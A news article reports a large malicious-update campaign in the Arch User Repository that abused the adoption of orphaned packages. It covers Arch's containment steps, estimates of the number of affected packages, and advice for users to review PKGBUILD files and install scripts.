Arch Linux is dealing with one of the largest security incidents to hit the Arch User Repository in recent memory, as maintainers continue cleaning up a wave of malicious package updates across the community-maintained platform.
Importantly, the AUR remains online, and packages are accessible. However, new account registration is unavailable, with the registration page returning a 503 Service Unavailable error. While not officially announced, this suggests Arch has temporarily blocked an entry point as it works through the cleanup.
The move follows an official Arch Linux warning notice dated June 12 about a “high volume” of malicious package adoptions and updates in the AUR. Maintainers are tracking down malicious commits and trying to prevent more from being pushed while preparing a permanent solution.
Arch also warned users may experience problems with new account creation, package updates, adoptions, and new package creation during the response.
Unfortunately, the incident appears far larger than early reports suggested. Initial public reports pointed to over 400 affected AUR packages, while later community tracking raised the number to more than 1,500. The final count may still change as maintainers continue auditing and removing malicious changes.
The scale of the AUR helps explain why the incident is difficult to contain quickly. According to the repository’s own statistics, the AUR currently lists 107,405 packages, including 13,051 orphan packages. It also shows 273 packages added in the past seven days and 5,575 packages updated over the same period, alongside 141,968 registered users.
The campaign reportedly abused the AUR’s package adoption system, where orphaned packages can be taken over by new maintainers. Malicious updates were pushed to affected packages, sometimes pulling external payloads during build or installation.
For users, the immediate advice remains: review PKGBUILD files and install scripts before installing or updating AUR packages, especially if a package recently changed maintainer or received an unexpected update. Users who installed recently updated packages should check the package history and inspect commands executed during build or install.
Expectably, this incident will likely renew discussion around AUR safeguards. Possible areas include tougher rules for adopting orphan packages, delays before new accounts can submit or adopt packages, and stronger review of sudden ownership changes.
For now, Arch Linux is keeping the AUR operational while blocking or limiting actions that could let the campaign continue. New registrations being unavailable is the clearest sign the project is taking containment measures while maintainers clean up malicious packages.
